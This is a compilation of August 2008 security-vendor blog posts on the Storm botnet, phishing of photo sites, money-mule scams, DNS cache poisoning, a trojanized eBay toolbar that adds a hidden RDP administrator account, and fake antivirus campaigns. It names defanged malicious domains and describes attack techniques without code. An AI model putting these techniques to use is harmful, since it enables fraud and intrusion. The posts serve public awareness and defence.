August 2008 - Posts

 

Seventy-seven megabytes of network traffic, 356 spam emails sent and 10,082 unique IP addresses contacted. All in just under 60 minutes.

This is what a system infected by one recent Storm rootkit pumps out. Since Storm first arrived on the scene in January of last year, it has made headlines throughout the world as one of the most successful and persistent threats currently operating in the wild. At Symantec, our global spam traps caught just under 150,000 Storm-generated emails during June and July this year: 

 

 

 

And, the tried-and-true method by which the Storm team successfully infects machines hasn't changed either. The method consists of bulk emailing with "interesting" content aimed at enticing the victim into either visiting a Web site or opening an attachment.

The various topics used per spam round included war, politics, murder, adult entertainment, romance, public holidays, sporting events, business transactions, surveys, terrorism and natural disasters and these are certainly a contributing factor to the prevalence and persistence of infections. Such topics, based both on real-world current events and false-but-interesting scenarios, still appear to be a fairly successful propagation technique and are clearly favoured by those behind Storm.

At the heart of the rootkit are two files: in this case, glok+serv.config and glok+767-4e80.sys. The first file contains a list of encrypted peers with which the infected host maintains contact with and is updated periodically with new nodes, and the second is the rootkit-based service which performs all of the primary functions of the zombie including spamming, denial-of-service and component updates. A range of API calls are hooked by the rootkit in an attempt to hide its presence on the system, such as ZwEnumerateValueKey and ZwQueryDirectoryFile.

The botnet itself runs its main operations over UDP, communicating via a fairly aggressive peer-to-peer network. The resulting traffic surge is fairly easy to spot:

 

 

 

 

The sale of spam-capable services that run from public hosts can net a bot controller a nice income, because fresh zombies can send upwards of 10,000 emails a day. And even if a particular Storm zombie is added to one of the many available spam blocking lists, the bot controller can still run distributed denial-of-service attacks with devastating speed. Also, the variances in the operation of Storm aren't restricted to email subjects, as we have watched its operators use polymorphic packers to defeat CRC-based detection, then experiment by removing the rootkit functionality to leave a plainly visible executable, and then return once again to a rootkit-enabled version.

We get quite a few questions in the form of "Yes, but if I get infected what does this actually mean?" To sum it all up, it means that:

  • Complete control of your computer system is in someone else's hands.
  • Any unprotected private information stored on your system is effectively no longer private.
  • Your machine can be used to attack other machines on the Internet.

It is true that an unusable machine is of no use to a bot herder, and this is perhaps one of the reasons that infected nodes that make up the Storm worm are still quite operational (from the end users' experience). It is in the interest of the players behind botnets that infected machines remain operational and that the suspicions of users are not aroused. This is a clear indication of the financial gains available for criminals who can successfully create and manage a botnet. And, at the time of writing this entry, our monitoring systems show that the spammed emails sent from infected systems are all related to the sale of male enhancement pills.

But nothing really hits a point home more than an example involving your money. If you run a company with just 1,000 computers total and you have just 0.5% of your machines infected with the Storm worm, you could be transacting up to 10 gigabytes a day unnecessarily. That's about 3.5 terabytes every year. For those out there who pay per gigabyte for traffic, this is hardly good news.
Message Edited by SR Blog Moderator on 08-18-2008 09:44 AM

Aug19

Phish in the (Photo)bucket

by Sarah Calaunan (Fraud Analyst)

Photobucket is, by far, one of the largest photo-sharing sites in the world. It is generally used for personal photographic albums, remote storage of avatars displayed on Internet forums, and storage of videos.

Lots of people may opt to keep their albums private, allow password-protected guest access, or open them up to the public. And now this photo-sharing site is being attacked by phishers.

The login page above looks exactly like the original site that lures the users to enter their user name and password.

Once victims enter their credentials, phishers can use them to obtain full access to victims’ Photobucket accounts, and may use the latter’s albums to insert malicious code.

Image-hosting sites have grown intensely popular and are widely used. A report from McCann released in March of this year has stated that a global volume of 63.2% of all active Internet users visit photo-sharing Web sites on a daily basis. So it naturally follows that popular image-hosting sites have become the targets of several attacks:

This particular URL is now blocked by the Trend Micro Smart Protection Network.

  • date 08-19-2008 08:58 AM
  • author Hon Lau writes:

Back in the 90's, Jamiroquai had a hit album named "Travelling without Moving." The title gives an apt description of some of the fantastic things that you can now do on the Internet. For example, we can now literally travel the world without moving beyond the comfort of the armchair. Applications such as Google Earth and Google Maps (with its Street View feature) enable anybody with a decent Internet connection to literally drop in to virtually any location on this planet.

These applications are great for planning visits-you can see exactly how far your hotel is from the train station, where there is parking, or even plot your full itinerary. You can also use these applications to get a feel for an area before you go there; for example, if you were visiting an unfamiliar area it's really useful to see what the building or location you are going to actually looks like before you get there. Addresses are sometimes hard to recognize and as the saying goes, a picture is worth a thousand words.

In this age of "carbon footprints," the oil crisis, corporate belt tightening, inflation, stagflation, subprime crisis, and a credit crunch, any means to save or earn extra cash must not be sniffed at. Let's say that you go job hunting and find a company offering you a great part time job where you can earn up a minimum of $2,500 a month. Wouldn't anyone be tempted by that, especially if it is posted in a respected career-search Web site?

Before you go sending off your resume (even one posted on well respected careers Web site), wouldn't you want to find out a bit more about the company that you might end up working for? Of course you would. After all, you want to make sure that the company on the receiving end of your services is going to pay up and is not a fly-by-night outfit. So, with that in mind I checked out a job posting by a company named Mortgage Union Trust, based in New York. The company offers a job titled "Monetary Operator" for "responsible individuals to cooperate with Mortgagee Union Trust Company processing department [sic]."



With a bit of digging, I found that the company also has a nice little Web site (mortgageeunion.com) that gives a company address of 51 South 12th Avenue, Mt. Vernon, NY 10550.



With the incredible powers of travel conferred upon me and my fellow netizens in support, I decided to drop in on the corporate headquarters where no doubt I would be offered at least a job interview (how could they turn me down with my super Web surfing skills?) once I had sent in my resume. So, with that, I cracked open a new browser window and called up Google Maps, entered in the address, and clicked into the Street View for the neighbourhood in question and this is what I found:



I have to admit that I'm not familiar with the New York area, but wow! This building is quite different from what I expected. The impressions given by the Web site would lead you to think that it will be all gleaming towers of glass set amongst the financial heart of the city with the office on the 50th floor and fantastic views to boot. So one of these handsome houses on a residential street in New York State is supposed to be the corporate headquarters of a respectable financial corporation? It doesn't really add up, my dream of earning easy cash at home is looking more and more distant. With a bit more research I find that this company is actually the latest in the line of many schemes dreamed up by the gang responsible for Trojan.Asprox.

Checking out the domain further, you can see that it is fast-fluxing through a whole host of IP addresses. This is definitely not your typical behaviour for legitimate Web sites. These IP addresses are no doubt zombie machines owned by the gang-today they might be hosting this scam Web site, tomorrow they may be sending out spam emails.

 

 

 

 

 

 

 

Well, now that my dreams of an early retirement are shattered and I'm back on Reality Street, there are some sober lessons to be learned from this. It is probably not news to you that there is a heck of a lot of scams out there and identity theft is rife. Recently I posted an article about an Olympic ticketing scam that ripped off many unsuspecting people, but this job scam might not necessarily rip you off. In fact, if you "cooperate" with the "processing department" of Mortgagee Union Trust you might even actually make a bit of cash by transferring funds from one account to another when instructed. (The job title should actually be "Money Mule," but it doesn't have the same air of self importance that "Monetary Operator" does.)

Whether you can make much, if any, money by taking part in this scheme is uncertain. What is certain is that you will inevitably be playing the pawn in a global game of scams, online crime, and money laundering. Next time an offer that's too good to refuse comes a-calling, save the precious gas and reduce your carbon footprint by using the Internet to visit the company, check out their credentials, and satisfy your curiosity that they are indeed a legitimate organization. Only when you have checked and double checked should you part with your valuable personal information.

Message Edited by SR Blog Moderator on 08-19-2008 09:25 AM

Aug17

Picture-Perfect Phishing

by Aivee Cortez (Fraud Analyst)

Oi Fotos, a photo storage Web site in Brazil, has been victimized recently by a phishing-spyware combo.


Figure 1: Screenshot of the legitimate Oi Fotos Web site

The bad guys have taken advantage of the mobile service of Oi Fotos. The phishing email contains a notification that the recipient has received photos from a cellular account and offers them an opportunity to view them — and of course, they need to click on the image.

A rough translation of the displayed text is as follows:

"You received a Oi Photos from cellular (0xx) **** - 2981. To see the photos, just click on the image below."


Figure 2: Sample screenshot of the phishing email

Upon clicking as directed, the recipient is directed to a malicious phishing site, which eventually attempts to install a piece of spyware, a program that monitors and gathers user information (e.g. online banking login credentials) from the victim’s machine.


Figure 3: Sample screenshot of the pop-up window that prompts users to download a spyware file on their systems

Trend Micro already detects the file as MAL_BANKER, a heuristics detection name for files that manifest characteristics similar to those of the TSPY_BANCOS and TSPY_BANKER spyware families. These families can steal online banking information.

The URLS are now blocked by the Trend Micro Smart Protection Network.

Monday, August 18, 2008

Compromised Cpanel Accounts For Sale

Is the once popular in the second quarter of 2007, embedded malware tactic on the verge of irrelevance, and if so, what has contributed to its decline? Have SQL injections executed through botnets turned into the most efficient way to infect hundreds of thousands of legitimate web sites? Depends on who you're dealing with.

A cyber criminal's position in the "underground food chain" can be easily tracked down on the basis of tools and tactics that he's taking advantage of, in fact, some would on purposely misinform on what their actual capabilities are in order not to attract too much attention to their real ones, consisting of high-profile compromises at hundreds of high-profile web sites.

Embedded malware may not be as hot as it used to be in the last quarter of 2007, but thanks to the oversupply of stolen accounting data, certain individuals within the underground ecosystem seem to be abusing entire portfolios of domains on the basis of purchasing access to the compromised accounts. In fact, the oversupply of compromised Cpanel accounts is logically resulting in their decreasing price, with the sellers differentiating their propositions, and charging premium prices based on the site's page ranks and traffic, measured through publicly available services, or through the internal statistics.


SQL injections may be the tactic of choice for the time being, but as long as stolen accounting data consisting of Cpanel logins, and web shells access to misconfigured web servers remain desired underground goods, goold old fashioned embedded malware will continue taking place.

Interestingly, from an economic perspective, the way the seller markets his goods, can greatly influence the way they get abused given he continues offering after-sale services and support. It's blackhat search engine optimization I have in mind, sometimes the tactic of choice especially given its high liquidity in respect to monetizing the compromised access.

The bottom line - for the time being, there's a higher probability that your web properties will get SQL injected, than IFRAME-ed, as it used to be half a year ago, and that's because what used to be a situation where malicious parties would aim at launching a targeted attack at high profile site and abuse the huge traffic it receives, is today's pragmatic reality where a couple of hundred low profile web sites can in fact return more traffic to the cyber criminals, and greatly extend the lifecycle of their campaign taking advantage of the fact the the low profile site owners would remain infected and vulnerable for months to come.

Related posts:
Embedding Malicious IFRAMEs Through Stolen FTP Accounts
Injecting IFRAMEs by Abusing Input Validation
Money Mule Recruiters use ASProx's Fast-flux Services
Malware Domains Used in the SQL Injection Attacks
Obfuscating Fast-fluxed SQL Injected Domains
SQL Injecting Malicious Doorways to Serve Malware
Yet Another Massive SQL Injection Spotted in the Wild
Malware Domains Used in the SQL Injection Attacks
SQL Injection Through Search Engines Reconnaissance
Google Hacking for Vulnerabilities
Fast-Fluxing SQL injection attacks executed from the Asprox botnet
Sony PlayStation's site SQL injected, redirecting to rogue security software
Redmond Magazine Successfully SQL Injected by Chinese Hacktivists

China Netcom DNS cache poisoning

Date:08.19.2008

Threat Type: Malicious Web Site / Malicious Code

Websense® Security Labs™ ThreatSeeker™ Network has detected that the DNS cache on the default DNS server used by the customers of China Netcom (CNC) has been poisoned. When China Netcom customers mistype and enter an invalid domain name, the poisoned DNS server directs the visitor's browser to a page that contains malicious code. China Netcom is among the top ISPs in that country.

When users mistype a domain name, they are sometimes directed by their ISPs to a placeholder Web site with generic advertisements. This is typically an additional revenue source for the ISP. In the case of CNC, customers of this prominent ISP are directed to a Web site under the control of an attacker.

These malicious sites contain an iframe with malicious code that attempts to exploit, among other applications and plug-ins, the Microsoft Snapshot Viewer vulnerability which we reported on at the start of the month.

The following screenshots show an nslookup of a potential mistyped URL. The first shows an unaffected name server, while the second shows the poisoned name server:

Unaffected name server:

Poisoned DNS server:

A user querying an unaffected DNS server is taken through to a clean site:

A user querying a poisoned name server is taken to a malicious site under the attacker's control:


The malicious iframe points to a server in China hosting exploits for RealPlayer, MS06-014, MS Snapshot Viewer and Adobe Flash player.

Websense Messaging and Websense Web Security customers are protected against this attack.

********************************************************************

Title: Microsoft Security Bulletin Re-Releases

Issued: August 26, 2008

********************************************************************

Summary

=======

The following bulletins have undergone a major revision increment.

Please see the appropriate bulletin for more details.

* MS07-050 - Critical

Bulletin Information:

=====================

* MS07-050 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-050.mspx

- Reason for Revision: V2.0 (August 26, 2008): Bulletin revised to include Internet Explorer 7 for Windows XP Service Pack 3.

- Originally posted: August 14, 2007

- Updated: August 26, 2008

- Bulletin Severity Rating: Critical

- Version: 2.0

More Than a Toolbar

Tuesday August 19, 2008 at 10:50 am CST
Posted by Di Tian

Trackback

We received a sample recently from a customer. Its file name, ToolbarSetup.exe, implies it may be toolbar installer. Upon execution, it displays the eBay toolbar EULA and the installation interface. And this program does indeed install the eBay toolbar.

However, something grabbed my attention during the installation. Besides the 2ebaytoolbarsetup.exe process, the program also created the wscript.exe process and ran .vbs files–that is not common for the toolbar installation. So I looked into every file dropped by the installer. Then something caught my eye. Besides the dozens of legit eBay toolbar components, there was a file named startup.exe. Unlike the toolbar components, this file had no version information. So I ran it in my test environment, and it generated a few batch and Visual Basic script files. The image below shows one of the generated .vbs files.

This file silently opens TCP port 3389, which is by default the port for Terminal Services. It creates a new account–”eBayMember”–with Administrator privileges and enables this account to remotely access the infected machine. The created account is also hidden from login screen, to prevent the victim from noticing.

Then the remote access ability of the compromised machine was verified by using the user name and password defined in the malicious .vbs file, as illustrated below. A successful login suggests the infected machine could be completely controlled by a remote attacker.

Still feel safe downloading and installing toolbars from untrusted sources? Attackers can take advantage.

Aug16
by Macky Cruz (Technical Communications)

Trend Micro Advanced Threats Researchers Ivan Macalintal and Paul Ferguson report that Internet spammers have turned to file-sharing scare-tactics. This is to entice would-be victims to open a malicious attachment, threatening the unfortunate recipients with interrupted Internet connectivity or legal action.

Here are are screenshots of two of the sample email messages:


Figure 1. A certain “ISP Consorcium” [sic] purports to protect the rights of software authors by monitoring networks.


Figure 2. Media Defender, a company known to protect clients from copyright infringement, was used this time. The spam says that the company claimed to have logged Internet activity on several BitTorrent sites.

Recipients are most likely to be motivated by fear to fall for this ruse. It is, after all, the Internet surfer’s worst nightmare to have all their Internet activities known to other parties — epecially those who threaten legal prosecution.

These spam runs seem to use a self-righteous tone against piracy, which makes the ruse even all the more believable. (Remember the Feds supposedly scanning Facebook accounts? Or how about the even more far-fetched one about the death of the Internet?)

However, downloading the attached file is not in the recipient’s best interests. We advise users to consider all unsolicited email suspect. We are currently investigating this incident and will update this entry as more information becomes available.

Drops, Dumps, CVVS, WMZ, WU, et cetera... Posted by Mikko @ 11:41 GMT | postCount('00001486'); Comments (6)

Underground forums are always full of chatter around various activities related to online crime.

You keep reading about things like dumps (stolen credit card information), carding (using those cards), WU (Western Union), WMZ (Webmoney), CVVs (card verification value) and drops.

So what's a drop?

A drop is a remailing location. Many online shops refuse to send expensive items (think laptops, video cameras and so on) to faraway countries. So criminals use stolen credit cards to purchase items and have them mailed to a local drop, where someone else picks up the gear and forwards it to the final destination. Alternatively the dropkeeper will simply sell the goods in online auctions and then credits the carder with part of the profits.

Here's an example from an underground forum where an individual is advertising his website, providing such services. He offers 25% of the profits of the carder items to the carder — keeping 75% to himself.

Drops

And here's his website. Nice one.

Drops

Aug15
by Ryan Flores (Advanced Threats Researcher)

Seems like the bad guys pushing fake antivirus software are not done yet.

We received several reports from the North American region earlier today about users being victimized by a rogue antispyware software. Users download this rogue program after they have somehow been convinced to click on malicious links. These links point to malware that caused overt signs (such as popup balloons and modified wallpapers) to appear on the PC, suggesting that the system has indeed been infected. This is not goodwill, though — downloading the “trial version” only scans the system. To remove the infection, the user will have to purchase the entire antispyware with real money. Users may be infected via spammed email messages, spammed instant messages, or even via ads served in social networking sites.

Soon enough, we’ve discovered not one but two fake antivirus software. This time the attack is made possible through a mass SEO (search engine optimization) poisoning involving several compromised Web sites. This development has certainly upped the chances of the rogue antispyware gaining mileage.

How does this work?

A simple Google/Yahoo! search can lead users to malware-serving site. Search strings such as “changes on the river amazon” or “changes made for mount Pinatubo” will lead them to a malicious Web site. Users who happen to use these strings will find themselves going down the long road of nasty redirections.

Figure 1. Poisoned string leads users to a malware-serving site.

Figure 2. Poisoned string leads users to a malware-serving site.

The two Web sites hosting the malicious pages are normal by themselves, but the exact URL that it points to will automatically redirect to hxxp:// windows-scanner2009. com.

Figure 3. The PC is redirected several times, during which the user begins to see signs that the PC is infected.

Figure 4. Message boxes suggest that the user might want to get rid of viruses in his/her PC by installing a certain software named Antivirus 2009.

Figure 5. Clicking OK in Figure 4 means the user has agreed to a “free scan.” The message even ends with what should be a comforting note saying that the file is certified free of malware. But don’t be fooled.

Figure 6. A convincing GUI for Antivirus 2009 performing the system scan might still convince users that they are using legitimate software.

After all the fake notifications, the user will be asked to download the file AV2009Install_880488.exe, which is detected by Trend Micro as TROJ_FAKEAV.DM.

The other fake antivirus will lead users to hxxp://scan. free-antispyware-scanner. com instead of the earlier example.

Figure 7. Variation on the rogue antispyware scam.

This will ask the user to download setup_100722_3.exe (detected as TROJ_FRAUDLOA.WM) instead of AV2009Install_880488.exe. (Note that the final agenda for both and most rogue antispyware scams is extortion. Users who fall for this scam pay a certain amount of money to the malware writers to purchase the full version of the fake antispyware.)

According to our investigation, there are about several dozen domains involved that are currently compromised. The hackers were able to upload PHP scripts that contain various text strings designed for SEO poisoning (manipulating or influencing the natural page rankings of search results in order to get more hits than a page really deserves).

This is not the first time Trend Micro has seen this incident — a previous SEO poisoning of this scale was also discovered back in December 2007, with SEO poisoning pages hosted on Blogspot. This time around, compromised Web sites were used instead.

Digging a little bit deeper, we’ve also found that the hackers have almost 1 million search phrases at their disposal for SEO poisoning. These search phrases cover the range from “free downloads, lyrics, travel, politics” and anything in between.

Malicious sites have “CLICK HERE! ALL INFORMATION!” and “CLICK HERE! WANT TO KNOW MORE ABOUT” as their page titles, so it is best to avoid clicking through Google/Yahoo! results that have those aforementioned site titles.


img {max-width:650px;width: expression(this.width > 650 ? 650: true);border-style:none; behavior: url(../iepngfix.htc); }
Aug14
by Paul Oliveria (Technical Communications)

Our researchers at TrendLabs have discovered a new set of rogue antivirus software circulating in the wild. Based on initial analysis, these threats arrive mainly via spammed email messages that contain a link to a bogus celebrity video scandal. We have also received reports that the said link is circulating in instant messaging applications and private messages in social networking Web sites, too.

Once the said URL link is clicked, the Web threat infection chain begins and ultimately leads to the download of a Trojan detected by Trend Micro as TROJ_FAKEAV.CX. This Trojan is a rogue antivirus that displays very convincing (and for some, alarming) messages, such as the following:

Note that since users are only using the “trial version,” TROJ_FAKEAV.CX even convinces users to get the full version so that they are always supposedly protected:

TROJ_FAKEAV.CX also drops another malware, detected as TROJ_RENOS.ACG. RENOS Trojans are known to have very visual payloads that may further alarm users — for example, they modify the system’s wallpaper and screensaver settings to display BSOD (Blue Screen of Death/Doom). Thus, users may be more convinced that something’s wrong with their system, not knowing that their new software is the one causing it.

Rogue antispyware isn’t entirely new, although our researchers have been seeing an increase in activity for the past couple of months (the Anjelina spam being one of the more recent examples).

Perhaps it’s because this is also the time of the year when the more legitimate security suites are releasing their latest software updates, and cyber criminals are riding on this season to ramp up their profits. Bad news for the infected users, though, as their latest versions of “antivirus software” are actually adding more threats to their system.

Trend Micro is still investigating this spam run. Updates will be posted when more information becomes available.

yahooBuzzArticleHeadline = "Fake Antivirus Trojans Ramping Up"; yahooBuzzArticleCategory = "world_news"; yahooBuzzArticleType = "text"; http://blog.trendmicro.com/fake-antivirus-trojans-ramping-up/trackback/ Buzz up!on Yahoo!

 

The Peacomm network has definitely turned out to be a survivor. With infections dating back to January 2007 and a P2P structure largely unchanged in about a year, Peacomm continues to evolve and infect new hosts. In early August our honeypots began capturing a new version of Peacomm. This iteration has been relatively low key as it propagates via users visiting infected Web sites, rather than by spam. Although Peacomm has been distributed via infected Web sites in the past, they were usually Web sites that were spammed to users as opposed to relying on drive-by downloading to gather its new recruits.

The attack toolkit used to install Peacomm in these drive-by attacks has changed as well. The infection begins with a user visiting an infectious Web site, which silently redirects the user to hostile content on a set of registered domains via an IFRAME. At this point, Kallisto TDS will serve a set of exploits against the victim. These include Acrobat PDF CollectEmailInfo, ANI Header Size, and MDAC.

Symantec IPS (NIS, NAV, N360, SEP, and SCS) will detect these attacks as follows with existing signatures:

HTTP ANI File Hdr Size BO

HTTP Malicious Toolkit Download Activity

HTTP MS Unsafe ActiveX Obj Instantiation

If a system were to become infected, the Peacomm P2P traffic will be detected as:

BD Peacomm Trojan - and the bot would be detected by antivirus as Trojan.Peacomm.
Message Edited by SR Blog Moderator on 08-14-2008 04:16 PM

Thoughts on the Best Western Compromise

Published: 2008-08-25,
Last Updated: 2008-08-25 16:51:18 UTC
by John Bambenek (Version: 1)

0 comment(s)

The Sunday Herald reported on Sunday that Best Western was struck by a trojan attack that lead to the possible compromise of about 8 million victims. There is some debate as to the extent of the breach and not a small amount of rumor going around. I'm not entirely disposed to trust corporate press releases for the facts, nor am I going to blindly accept claims of security researchers who's first call is to the PR team when discovering a problem.

That said, here is what seems to be the agreed upon facts:

- A trojan was installed on one of the machines in Best Western's booking systems which lead to a compromise of credentials for the hotel's staff. These credentials were attempted to (and probably successfully) sold to organizations with links to the Russian mafia.

- Best Western is and was PCI DCC compliant.

Of course, PCI really only helps one piece of the security equation and compliance is not the same as security. In fact, it is usually (at best) a poor substitute and more often an excuse to stop thinking about security ("We're Compliant!" followed by self-congratulatory back slapping). The same is true with relying on encryption. Encryption can be "defeated" and the ways to do it are well-known. (For instance, here is a paper I wrote almost 4 years ago on how to do it). If you can own the endpoint of a communication, encryption is irrelevant.

As another example, remember the backup tape heists a few years ago? Attackers know it takes an excessive amount of time to crack encryption, so they target ways to avoid it. Someone had the great idea of stealing backup tapes at which point few people would have even thought to have protected those. Now it's due diligence.

That said, here are 5 areas that are likely targets in the near future (or are targets now) that you may be overlooking:

- Centralized patching systems (i.e. WSUS). If you can hijack an update server and have it distribute a malicious patch, you own every desktop in an environment. The RedHat compromise should be a wake-up call in this regard.

- Centralized configuration and management systems (i.e. Configuresoft or the like). Same as above... the machine that controls all your desktops becomes the single point of pwnership.

- Payroll. Your payroll system has salary information and identification information. In short, it has everything you need to commit tax fraud. In the US, in particular, it also has your national identification number (what is falsely called a "Social Security Number") which allows an attacker to basically jack your entire identity as well.

- Web 2.0. There have been some attempts to spread malware or spear phish using Web 2.0 technology. In as far as your organization uses Web 2.0, the more "legitimate" a message looks, the more likely a user is to click it. Web 2.0 provides a great vector to compromise an organization, especially if many of your employees use it. (Think social engineering).

- Malicious insiders. Ok, this last one is not new, but still a solid majority of attacks have at least some component of an insider attack. In some cases, simply installing a keylogger and "selling" the result is simple enough for a disgruntled employee with even a token level of access to an environment.

Will put up more info on Best Western as the situation warrants. Thoughts to the top 5 lists? What would you add or take off?

--
John Bambenek
bambenek /at/ gmail \dot\ com

Keywords: best western compromise data loss

Published: 2008-08-22,
Last Updated: 2008-08-22 15:45:39 UTC
by Patrick Nolan (Version: 2)
0 comment(s) digg_url = 'http://isc.sans.org/diary.html?storyid=4921&rss'; digg_title = 'RedHat compromise sparks a Critical openssh security update'; digg_skin='compact'; digg_topic = 'security';

Critical: openssh security update

"Last week Red Hat detected an intrusion on certain of its computer systems and took immediate action". "In connection with the incident, the intruder was able to sign a small number of OpenSSH packages relating only to Red Hat Enterprise Linux 4  (i386 and x86_64 architectures only) and Red Hat Enterprise Linux 5 (x86_64 architecture only)".

"processes and efforts to date indicate that packages obtained by Red Hat Enterprise Linux subscribers via Red Hat Network are not at risk".

Affected Products: Red Hat Desktop (v. 4)
Red Hat Enterprise Linux (v. 5 server)
Red Hat Enterprise Linux AS (v. 4)
Red Hat Enterprise Linux AS (v. 4.5.z)
Red Hat Enterprise Linux Desktop (v. 5 client)
Red Hat Enterprise Linux ES (v. 4)
Red Hat Enterprise Linux ES (v. 4.5.z)
Red Hat Enterprise Linux WS (v. 4)

CVEs (cve.mitre.org): CVE-2007-4752

Update - RedHat OpenSSH blacklist script released

RedHat has released "shell script which lists the affected packages and can verify that none of them are installed on a system".

Keywords:
0 comment(s)
More Posts Next page »